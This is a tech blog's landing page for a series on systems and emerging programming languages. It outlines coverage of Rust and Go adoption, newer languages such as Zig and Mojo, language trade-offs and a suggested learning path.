This series covers the evolution of systems languages, adoption stories in production, and what language design principles are shaping the next generation.\nSystems languages matter everywhere—in infrastructure, security, performance-critical applications, and embedded systems.\nWhat You\u0026rsquo;ll Find Here # Language Features \u0026amp; Design: Understanding what makes languages suitable for systems work—memory management, concurrency models, performance characteristics, and ergonomics.\nRust Adoption: How Rust is entering production systems, Linux kernel integration, challenges with ecosystem immaturity, and where Rust\u0026rsquo;s strengths shine.\nGo Growth: Why Go became the lingua franca for cloud infrastructure and backend services, standard library strengths, and concurrent programming patterns.\nEmerging Languages: New contenders like Zig, Odin, V, and Mojo—radical rethinking of language design and solving specific problem domains.\nLanguage Comparisons: Understanding trade-offs between memory safety, performance, expressiveness, and ecosystem maturity.\nAdoption Patterns: How organizations transition from C/C++ to Rust, when Go is the right choice, and evaluating new languages for critical infrastructure.\nLearning Path # Understand systems programming constraints — memory safety, concurrency, performance, and reliability requirements Learn Rust fundamentals — ownership, borrowing, and why memory safety without GC matters Explore Go pragmatism — simplicity, concurrency patterns, and why Go excels for infrastructure Track emerging languages — understand new design approaches and when they solve real problems Make strategic choices — evaluating languages for your use case and team capabilities Key Languages \u0026amp; Topics Covered # Rust: Memory safety, ownership system, async/await, WASM, and production adoption Go: Concurrency primitives, goroutines, simplicity philosophy, and systems integration Emerging Languages: Zig (manual memory management 
without C), Mojo (Python with systems performance), Odin, V Language Features: Type systems, memory models, concurrency models, and error handling Ecosystem: Standard libraries, package managers, tooling, and third-party libraries Performance: Benchmarks, profiling, and optimization techniques in each language Interoperability: FFI, C bindings, and integrating with existing systems Related Series # Explore complementary areas: Python Evolution (Python\u0026rsquo;s role while systems languages handle critical paths), Developer Tooling (language-specific tooling and IDE support)\n","externalUrl":null,"permalink":"/series/systems--emerging-languages/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Systems \u0026 Emerging Languages","type":"series"}]